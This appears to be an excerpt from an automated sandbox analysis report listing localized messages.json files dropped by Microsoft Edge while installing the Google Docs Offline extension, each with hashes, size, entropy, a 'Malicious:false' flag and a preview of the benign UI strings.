                                                        SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                        SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                        SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\is\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):954
                                                        Entropy (8bit):4.6457079159286545
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                        SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                        SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                        SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\it\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):899
                                                        Entropy (8bit):4.474743599345443
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                        SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                        SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                        SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\iw\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2230
                                                        Entropy (8bit):3.8239097369647634
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                        SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                        SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                        SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ja\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1160
                                                        Entropy (8bit):5.292894989863142
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                        SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                        SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                        SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ka\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):3264
                                                        Entropy (8bit):3.586016059431306
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:83F81D30913DC4344573D7A58BD20D85
                                                        SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                        SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                        SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\kk\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):3235
                                                        Entropy (8bit):3.6081439490236464
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                        SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                        SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                        SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\km\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):3122
                                                        Entropy (8bit):3.891443295908904
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                        SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                        SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                        SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\kn\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1895
                                                        Entropy (8bit):4.28990403715536
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                        SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                        SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                        SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ko\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1042
                                                        Entropy (8bit):5.3945675025513955
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:F3E59EEEB007144EA26306C20E04C292
                                                        SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                        SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                        SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\lo\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2535
                                                        Entropy (8bit):3.8479764584971368
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:E20D6C27840B406555E2F5091B118FC5
                                                        SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                        SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                        SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\lt\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1028
                                                        Entropy (8bit):4.797571191712988
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:970544AB4622701FFDF66DC556847652
                                                        SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                        SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                        SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\lv\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):994
                                                        Entropy (8bit):4.700308832360794
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:A568A58817375590007D1B8ABCAEBF82
                                                        SHA1:B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
                                                        SHA-256:0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
                                                        SHA-512:FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ml\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2091
                                                        Entropy (8bit):4.358252286391144
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                        SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                        SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                        SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\mn\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):2778
                                                        Entropy (8bit):3.595196082412897
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                        SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                        SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                        SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\mr\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):1719
                                                        Entropy (8bit):4.287702203591075
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                        SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                        SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                        SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                        C:\Users\user\AppData\Local\Temp\scoped_dir7280_1839275086\CRX_INSTALL\_locales\ms\messages.json

                                                        Download File
                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):936
                                                        Entropy (8bit):4.457879437756106
                                                        Encrypted:false
                                                        SSDEEP:
                                                        MD5:7D273824B1E22426C033FF5D8D7162B7
                                                        SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                        SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                        SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                        Malicious:false
                                                        Reputation:unknown
